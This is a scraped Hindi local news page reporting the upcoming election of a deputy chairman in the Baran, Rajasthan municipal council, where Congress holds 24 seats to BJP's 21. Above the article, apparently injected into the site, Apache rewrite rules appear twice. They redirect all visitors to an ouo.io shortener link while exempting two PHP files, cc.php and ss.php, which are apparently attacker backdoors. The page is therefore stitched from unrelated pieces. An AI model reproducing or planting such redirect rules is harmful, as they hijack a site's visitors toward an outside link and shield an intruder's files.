
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 332
Previous Nextबारां। राजस्थान के बारां जिले में नगर परिषद में दो माह पूर्व उपसभापति के सभापति बनने के बाद खाली पड़ी उपसभापति की कुर्सी के लिए निर्वाचन विभाग ने उप सभापति के चुनाव के लिए अधिसूचना जारी कर दी है। बारां नगर परिषद में उप सभापति के लिए कल 14 मार्च को चुनाव होगा। वहीं उपसभापति के चुनाव के लिए भाजपा ओर काग्रेस ने प्रत्याशी के चयन को लेकर तैयारियां पूरी कर ली है। हालंकि बहुमत के आधार पर कांग्रेस का उपसभापति बनना तय है, लेकिन जिस प्रकार सभापति के चुनाव के दौरान दोनों पार्टियों में कुछ दिन पहले हुए घटनाक्रम दोबारा ना हो इसके लिए बड़े सभी नेता निगाह बनाए हुए हैं। नगर परिषद बारां में वर्तमान में कांग्रेस के 24 और भाजपा के 21 वार्ड पार्षद हैं। कांग्रेस का उपसभापति बनना तय है। फिर भी उपसभापति पर कब्जा बरकरार रखने के लिए कांग्रेस पूरी रणनीति से जुटी हुई है। कल 14 मार्च को उप सभापति के चुनाव के लिए नामांकन के बाद मतदान और परिणाम शाम तक जारी कर दिये जायेंगे जिसके लिए प्रशासन ने तैयारियां पूरी कर ली हैं।